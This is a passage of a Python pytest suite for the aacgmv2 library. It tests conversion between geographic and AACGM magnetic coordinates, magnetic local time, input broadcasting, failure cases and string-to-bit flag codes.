if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_arr_single(self):
"""Test array latlon conversion for array input of shape (1,)"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([60]), np.array([0]),
np.array([300]), self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.2257709], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346], rtol=1e-4)
def test_convert_latlon_arr_arr(self):
"""Test array latlon conversion for array input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([60, 61]),
np.array([0, 0]),
np.array([300, 300]),
self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_list_mix(self):
"""Test array latlon conversion for mixed types with list"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60, 61], 0, 300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_arr_mix(self):
"""Test array latlon conversion for mixed type with an array"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([60, 61]), 0,
300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_mult_arr_mix(self):
"""Test array latlon conversion for mix type with multi-dim array"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([[60, 61, 62],
[63, 64, 65]]),
0, 300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out,
[[58.2257709, 59.3186093, 60.4039740],
[61.4819893, 62.5527635, 63.6163840]],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out,
[[81.1684696, 81.6139893, 82.0871880],
[82.5909499, 83.1285895, 83.7039272]],
rtol=1e-4)
np.testing.assert_allclose(self.r_out,
[[1.04566346, 1.04561304, 1.04556369],
[1.04551548, 1.04546847, 1.04542272]],
rtol=1e-4)
def test_convert_latlon_arr_mult_arr_unequal(self):
"""Test array latlon conversion for unequal sized multi-dim array"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([[60, 61, 62],
[63, 64, 65]]),
np.array([0]),
np.array([300]), self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out,
[[58.2257709, 59.3186093, 60.4039740],
[61.4819893, 62.5527635, 63.6163840]],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out,
[[81.1684696, 81.6139893, 82.0871880],
[82.5909499, 83.1285895, 83.7039272]],
rtol=1e-4)
np.testing.assert_allclose(self.r_out,
[[1.04566346, 1.04561304, 1.04556369],
[1.04551548, 1.04546847, 1.04542272]],
rtol=1e-4)
def test_convert_latlon_arr_badidea(self):
"""Test array latlon conversion for BADIDEA"""
code = "G2A | BADIDEA"
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [3000],
self.dtime, code)
np.testing.assert_allclose(self.lat_out, [64.35677791], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [83.30272053], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.46944431], rtol=1e-4)
def test_convert_latlon_arr_location_failure(self):
"""Test array latlon conversion with a bad location"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([0], [0], [0], self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
if not np.all([np.isnan(self.lat_out), np.isnan(self.lon_out),
np.isnan(self.r_out)]):
raise AssertionError()
def test_convert_latlon_arr_time_failure(self):
"""Test array latlon conversion with a bad time"""
with pytest.raises(AssertionError):
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [300], None)
def test_convert_latlon_arr_datetime_date(self):
"""Test array latlon conversion with date and datetime input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [300], self.ddate)
lat_2, lon_2, r_2 = aacgmv2.convert_latlon_arr([60], [0], [300],
self.dtime)
np.testing.assert_almost_equal(self.lat_out, lat_2, decimal=6)
np.testing.assert_almost_equal(self.lon_out, lon_2, decimal=6)
np.testing.assert_almost_equal(self.r_out, r_2, decimal=6)
del lat_2, lon_2, r_2
def test_warning_below_ground_convert_latlon_arr(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [-1],
self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_convert_latlon_arr_maxalt_failure(self):
"""For an array, test failure for an altitude too high for
coefficients"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [2001], self.dtime)
if not np.all([np.isnan(self.lat_out), np.isnan(self.lon_out),
np.isnan(self.r_out)]):
raise AssertionError()
def test_convert_latlon_arr_lat_failure(self):
"""Test error return for co-latitudes above 90 for an array"""
with pytest.raises(AssertionError):
aacgmv2.convert_latlon_arr([91, 60, -91], 0, 300, self.dtime)
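# Illustrative aside (standalone sketch, not part of the original suite):
# the unequal-shape test above relies on numpy-style broadcasting, where a
# (2, 3) latitude array combines with shape-(1,) longitude and altitude
# arrays to yield (2, 3) output. A minimal model of that alignment:
def _demo_broadcast_shapes(lat, lon, alt):
    """Return the common shape that lat, lon, and alt broadcast to."""
    blat, blon, balt = np.broadcast_arrays(np.asarray(lat),
                                           np.asarray(lon),
                                           np.asarray(alt))
    return blat.shape, blon.shape, balt.shape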
class TestGetAACGMCoord:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.mlat_out = None
self.mlon_out = None
self.mlt_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.mlat_out, self.mlon_out, self.mlt_out, self.dtime, self.ddate
def test_get_aacgm_coord(self):
"""Test single value AACGMV2 calculation, defaults to TRACE"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 300, self.dtime)
np.testing.assert_almost_equal(self.mlat_out, 58.2247, decimal=4)
np.testing.assert_almost_equal(self.mlon_out, 81.1761, decimal=4)
np.testing.assert_almost_equal(self.mlt_out, 0.1889, decimal=4)
def test_get_aacgm_coord_badidea(self):
"""Test single value AACGMV2 calculation with a bad flag"""
method = "BADIDEA"
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 3000, self.dtime,
method=method)
np.testing.assert_almost_equal(self.mlat_out, 64.3568, decimal=4)
np.testing.assert_almost_equal(self.mlon_out, 83.3027, decimal=4)
np.testing.assert_almost_equal(self.mlt_out, 0.3307, decimal=4)
del method
def test_get_aacgm_coord_location_failure(self):
"""Test single value AACGMV2 calculation with a bad location"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(0, 0, 0, self.dtime)
if not (np.isnan(self.mlat_out) & np.isnan(self.mlon_out) &
np.isnan(self.mlt_out)):
raise AssertionError()
def test_get_aacgm_coord_time_failure(self):
"""Test single value AACGMV2 calculation with a bad datetime"""
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 300, None)
def test_get_aacgm_coord_datetime_date(self):
"""Test single AACGMV2 calculation with date and datetime input"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 300, self.ddate)
mlat_2, mlon_2, mlt_2 = aacgmv2.get_aacgm_coord(60, 0, 300, self.dtime)
np.testing.assert_almost_equal(self.mlat_out, mlat_2, decimal=6)
np.testing.assert_almost_equal(self.mlon_out, mlon_2, decimal=6)
np.testing.assert_almost_equal(self.mlt_out, mlt_2, decimal=6)
del mlat_2, mlon_2, mlt_2
def test_warning_below_ground_get_aacgm_coord(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, -1, self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_get_aacgm_coord_maxalt_failure(self):
"""For a single value, test failure for an altitude too high for
coefficients"""
method = ""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 2001, self.dtime,
method=method)
if not (np.isnan(self.mlat_out) & np.isnan(self.mlon_out) &
np.isnan(self.mlt_out)):
raise AssertionError()
def test_get_aacgm_coord_mlat_failure(self):
"""Test error return for co-latitudes above 90 for a single value"""
import logbook
lerr = u"unrealistic latitude"
with logbook.TestHandler() as hhigh:
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(91, 0, 300, self.dtime)
if not hhigh.has_error(lerr):
raise AssertionError()
with logbook.TestHandler() as hlow:
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(-91, 0, 300,
self.dtime)
if not hlow.has_error(lerr):
raise AssertionError()
hhigh.close()
hlow.close()
class TestGetAACGMCoordArr:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.mlat_out = None
self.mlon_out = None
self.mlt_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.mlat_out, self.mlon_out, self.mlt_out, self.dtime, self.ddate
def test_get_aacgm_coord_arr_single_val(self):
"""Test array AACGMV2 calculation for a single value"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(60, 0, 300, self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out, [58.22474610], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out, [81.17611033], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out, [0.18891995], rtol=1e-4)
def test_get_aacgm_coord_arr_list_single(self):
"""Test array AACGMV2 calculation for list input of single values"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out, [58.22474610], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out, [81.17611033], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out, [0.18891995], rtol=1e-4)
def test_get_aacgm_coord_arr_list(self):
"""Test array AACGMV2 calculation for list input"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60, 61], [0, 0],
[300, 300], self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_arr_single(self):
"""Test array AACGMV2 calculation for array with a single value"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(np.array([60]),
np.array([0]),
np.array([300]),
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
np.testing.assert_almost_equal(self.mlat_out, 58.2247, decimal=4)
np.testing.assert_almost_equal(self.mlon_out, 81.1761, decimal=4)
np.testing.assert_almost_equal(self.mlt_out, 0.1889, decimal=4)
def test_get_aacgm_coord_arr_arr(self):
"""Test array AACGMV2 calculation for an array"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(np.array([60, 61]),
np.array([0, 0]),
np.array([300, 300]),
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_list_mix(self):
"""Test array AACGMV2 calculation for a list and floats"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60, 61], 0, 300,
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_arr_mix(self):
"""Test array AACGMV2 calculation for an array and floats"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(np.array([60, 61]), 0,
300, self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_mult_arr_mix(self):
"""Test array AACGMV2 calculation for a multi-dim array and
floats"""
mlat_in = np.array([[60, 61, 62], [63, 64, 65]])
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(mlat_in, 0, 300,
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[[58.2247461, 59.3164801, 60.4008651],
[61.4780560, 62.5481858, 63.6113609]],
rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[[81.1761103, 81.6228136, 82.0969646],
[82.6013918, 83.1393547, 83.7146224]],
rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[[0.18891995, 0.21870017, 0.25031024],
[0.28393872, 0.31980291, 0.35815409]],
rtol=1e-4)
del mlat_in
def test_get_aacgm_coord_arr_arr_unequal(self):
"""Test array AACGMV2 calculation for unequal arrays"""
mlat_in = np.array([[60, 61, 62], [63, 64, 65]])
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(mlat_in, np.array([0]),
np.array([300]),
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[[58.2247, 59.3165, 60.4009],
[61.4781, 62.5482, 63.6114]], rtol=1e-3)
np.testing.assert_allclose(self.mlon_out,
[[81.1761, 81.6228, 82.0970],
[82.6014, 83.1394, 83.7146]], rtol=1e-3)
np.testing.assert_allclose(self.mlt_out,
[[0.1889, 0.2187, 0.2503],
[0.2839, 0.3198, 0.3582]], rtol=1e-3)
del mlat_in
def test_get_aacgm_coord_arr_badidea(self):
"""Test array AACGMV2 calculation for BADIDEA"""
method = "BADIDEA"
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [3000],
self.dtime, method=method)
np.testing.assert_allclose(self.mlat_out, [64.35677791], rtol=1e-3)
np.testing.assert_allclose(self.mlon_out, [83.30272053], rtol=1e-3)
np.testing.assert_allclose(self.mlt_out, [0.33069397], rtol=1e-3)
del method
def test_get_aacgm_coord_arr_location_failure(self):
"""Test array AACGMV2 calculation with a bad location"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([0], [0], [0], self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
if not np.all([np.isnan(self.mlat_out), np.isnan(self.mlon_out),
np.isnan(self.mlt_out)]):
raise AssertionError()
def test_get_aacgm_coord_arr_time_failure(self):
"""Test array AACGMV2 calculation with a bad time"""
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
None)
def test_get_aacgm_coord_arr_datetime_date(self):
"""Test array AACGMV2 calculation with date and datetime input"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
self.ddate)
mlat_2, mlon_2, mlt_2 = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
self.dtime)
np.testing.assert_almost_equal(self.mlat_out, mlat_2, decimal=6)
np.testing.assert_almost_equal(self.mlon_out, mlon_2, decimal=6)
np.testing.assert_almost_equal(self.mlt_out, mlt_2, decimal=6)
del mlat_2, mlon_2, mlt_2
def test_warning_below_ground_get_aacgm_coord_arr(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [-1],
self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_get_aacgm_coord_arr_maxalt_failure(self):
"""For an array, test failure for an altitude too high for
coefficients"""
method = ""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [2001],
self.dtime, method=method)
if not np.all([np.isnan(self.mlat_out), np.isnan(self.mlon_out),
np.isnan(self.mlt_out)]):
raise AssertionError()
del method
def test_get_aacgm_coord_arr_mlat_failure(self):
"""Test error return for co-latitudes above 90 for an array"""
import logbook
lerr = u"unrealistic latitude"
with logbook.TestHandler() as handler:
with pytest.raises(AssertionError):
aacgmv2.get_aacgm_coord_arr([91, 60, -91], 0, 300,
self.dtime)
if not handler.has_error(lerr):
raise AssertionError()
handler.close()
class TestConvertCode:
@staticmethod
def test_convert_str_to_bit_g2a():
"""Test conversion from string code to bit G2A"""
if aacgmv2.convert_str_to_bit("G2A") != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_a2g():
"""Test conversion from string code to bit A2G"""
if aacgmv2.convert_str_to_bit("A2G") != aacgmv2._aacgmv2.A2G:
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_trace():
"""Test conversion from string code to bit TRACE"""
if aacgmv2.convert_str_to_bit("TRACE") != aacgmv2._aacgmv2.TRACE:
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_allowtrace():
"""Test conversion from string code to bit ALLOWTRACE"""
if (aacgmv2.convert_str_to_bit("ALLOWTRACE") !=
aacgmv2._aacgmv2.ALLOWTRACE):
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_badidea():
"""Test conversion from string code to bit BADIDEA"""
if (aacgmv2.convert_str_to_bit("BADIDEA") !=
aacgmv2._aacgmv2.BADIDEA):
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_geocentric():
"""Test conversion from string code to bit GEOCENTRIC"""
if (aacgmv2.convert_str_to_bit("GEOCENTRIC") !=
aacgmv2._aacgmv2.GEOCENTRIC):
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_lowercase():
"""Test conversion from string code to bit for a lowercase code"""
if aacgmv2.convert_str_to_bit("g2a") != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_spaces():
"""Test conversion from string code to bit for a code with spaces"""
if (aacgmv2.convert_str_to_bit("G2A | trace") !=
aacgmv2._aacgmv2.G2A + aacgmv2._aacgmv2.TRACE):
raise AssertionError()
@staticmethod
def test_convert_str_to_bit_invalid():
"""Test conversion from string code to bit for an invalid code"""
if aacgmv2.convert_str_to_bit("ggoogg|") != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@staticmethod
def test_convert_bool_to_bit_g2a():
"""Test conversion from Boolean flags to bit G2A"""
if aacgmv2.convert_bool_to_bit() != aacgmv2._aacgmv2.G2A:
raise AssertionError()
@staticmethod
def test_convert_bool_to_bit_a2g():
"""Test conversion from Boolean flags to bit A2G"""
if aacgmv2.convert_bool_to_bit(a2g=True) != aacgmv2._aacgmv2.A2G:
raise AssertionError()
@staticmethod
def test_convert_bool_to_bit_trace():
"""Test conversion from Boolean flags to bit TRACE"""
if aacgmv2.convert_bool_to_bit(trace=True) != aacgmv2._aacgmv2.TRACE:
raise AssertionError()
@staticmethod
def test_convert_bool_to_bit_allowtrace():
"""Test conversion from Boolean flags to bit ALLOWTRACE"""
if (aacgmv2.convert_bool_to_bit(allowtrace=True) !=
aacgmv2._aacgmv2.ALLOWTRACE):
raise AssertionError()
@staticmethod
def test_convert_bool_to_bit_badidea():
"""Test conversion from Boolean flags to bit BADIDEA"""
if (aacgmv2.convert_bool_to_bit(badidea=True) !=
aacgmv2._aacgmv2.BADIDEA):
raise AssertionError()
@staticmethod
def test_convert_bool_to_bit_geocentric():
"""Test conversion from Boolean flags to bit GEOCENTRIC"""
if (aacgmv2.convert_bool_to_bit(geocentric=True) !=
aacgmv2._aacgmv2.GEOCENTRIC):
raise AssertionError()
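# Illustrative aside (hypothetical bit values, not the real
# aacgmv2._aacgmv2 constants): codes such as "G2A | trace" are parsed
# case-insensitively into additive bit flags, with unrecognized tokens
# falling through to the G2A default. A minimal model of that parsing:
_DEMO_FLAGS = {"G2A": 0, "A2G": 1, "TRACE": 2, "ALLOWTRACE": 4,
               "BADIDEA": 8, "GEOCENTRIC": 16}
def _demo_str_to_bit(code):
    """Sum the bit values of the recognized '|'-separated flag names."""
    return sum(_DEMO_FLAGS.get(tok.strip().upper(), 0)
               for tok in code.split("|"))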
class TestMLTConvert:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.dtime2 = dt.datetime(2015, 1, 1, 10, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.mlon_out = None
self.mlt_out = None
self.mlt_diff = None
self.mlon_list = [270.0, 80.0, -95.0]
self.mlt_list = [12.0, 25.0, -1.0]
self.mlon_comp = [-101.657689, 93.34231102, 63.34231102]
self.mlt_comp = [12.77717927, 0.1105126, 12.44384593]
self.diff_comp = np.ones(shape=(3,)) * -10.52411552
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.mlon_out, self.mlt_out, self.mlt_list, self.mlon_list
del self.mlon_comp, self.mlt_comp, self.mlt_diff, self.diff_comp
def test_date_input(self):
"""Test to see that the date input works"""
self.mlt_out = aacgmv2.convert_mlt(self.mlon_list, self.ddate,
m2a=False)
np.testing.assert_allclose(self.mlt_out, self.mlt_comp, rtol=1.0e-4)
def test_datetime_exception(self):
"""Test to see that a value error is raised with bad time input"""
with pytest.raises(ValueError):
self.mlt_out = aacgmv2.wrapper.convert_mlt(self.mlon_list, 1997)
def test_inv_convert_mlt_single(self):
"""Test MLT inversion for a single value"""
for i, mlt in enumerate(self.mlt_list):
self.mlon_out = aacgmv2.convert_mlt(mlt, self.dtime, m2a=True)
np.testing.assert_almost_equal(self.mlon_out, self.mlon_comp[i],
decimal=4)
def test_inv_convert_mlt_list(self):
"""Test MLT inversion for a list"""
self.mlon_out = aacgmv2.convert_mlt(self.mlt_list, self.dtime, m2a=True)
np.testing.assert_allclose(self.mlon_out, self.mlon_comp, rtol=1.0e-4)
def test_inv_convert_mlt_arr(self):
"""Test MLT inversion for an array"""
self.mlon_out = aacgmv2.convert_mlt(np.array(self.mlt_list), self.dtime,
m2a=True)
np.testing.assert_allclose(self.mlon_out, self.mlon_comp, rtol=1.0e-4)
def test_inv_convert_mlt_wrapping(self):
"""Test MLT wrapping"""
self.mlon_out = aacgmv2.convert_mlt(np.array([1, 25, -1, 23]),
self.dtime, m2a=True)
np.testing.assert_almost_equal(self.mlon_out[0], self.mlon_out[1],
